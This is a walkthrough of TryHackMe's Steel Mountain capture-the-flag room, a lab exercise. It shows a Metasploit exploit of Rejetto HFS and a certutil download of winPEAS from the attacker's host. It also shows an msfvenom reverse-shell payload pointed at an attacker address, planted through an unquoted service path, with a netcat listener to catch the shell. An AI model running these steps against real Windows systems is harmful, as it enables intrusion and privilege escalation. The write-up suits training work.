This walkthrough covers the Steel Mountain CTF found on TryHackMe. This room is designed to evaluate our Windows OS enumeration skills. We will utilize Metasploit to gain an initial foothold, followed by PowerShell to enumerate the machine and escalate our privileges to Administrator.
Step 1: Nmap
Note: ICMP is disabled, so we'll have to use the -Pn
flag.
nmap -Pn -p- 10.10.0.5 -vvv
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 125
135/tcp open msrpc syn-ack ttl 125
139/tcp open netbios-ssn syn-ack ttl 125
445/tcp open microsoft-ds syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125
5985/tcp open wsman syn-ack ttl 125
8080/tcp open http-proxy syn-ack ttl 125
47001/tcp open winrm syn-ack ttl 125
49152/tcp open unknown syn-ack ttl 125
49153/tcp open unknown syn-ack ttl 125
49154/tcp open unknown syn-ack ttl 125
49155/tcp open unknown syn-ack ttl 125
49156/tcp open unknown syn-ack ttl 125
49169/tcp open unknown syn-ack ttl 125
49170/tcp open unknown syn-ack ttl 125
From this scan, we can tell that there are two web servers, one of which will be our attack vector to get an initial foothold. Visiting the site on port 80 reveals nothing more than a static page for an employee of the month. Looking at the source code helps us identify a name, Bill Harper.
Moving on over to port 8080 proves to be a little more useful. Right off the bat, we can tell this is a user panel to an HTTP File Server.
Looking at the source code helps us narrow it down to a Rejetto HTTP File Server
. This is great news because this version is vulnerable to an RCE and Metasploit has a module for it called rejetto_hfs_exec
.
Step 2: Metasploit
From here we want to search for the rejetto
module and configure the options.
After properly configuring the module and typing exploit
, we get a meterpreter session and pop a shell to grab our first flag located in C:\Users\bill\Deskto
p. Use type user.txt
to view it from the command line.
Step 3: Privilege Escalation
To enumerate this machine, we will use winPEAS
. You can download the latest version here.
Start a Python server:
python3 -m http.server 8000
Upload winPEAS
to the victims C:\Users\bill\Desktop
directory using certutil.exe
.
certutil.exe -urlcache -f http://10.13.28.215:8000/winPEASany_ofs.exe winPEASany_ofs.exe
Run it by typing winPEASany_ofs.exe
.
An interesting service called AdvancedSystemCareService9
is missing quotes and has a space in between the application name, which means we can escape it and run a program called "Advanced.exe
" with a reverse shell.
Let's fire up msfvenom
and generate a payload.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f exe -o Advanced.exe
Startup a Python server and transfer the payload over using certutil
.
Move it to "C:\Program Files (x86)\IObit\"
, and be sure to put the file path in quotes due to the space.
Now we want to stop the AdvancedSystemCareService9
service.
Start a netcat listener to catch the reverse shell.
nc -lvnp 1337
Start the AdvancedSystemCareService9
service back up.
Step 4: Root
Pwned! From here we can grab the last flag found in C:\Users\Administrator\Desktop
.
I hope you enjoyed this walkthrough of the Steel Mountain CTF found on TryHackMe. Happy Hacking.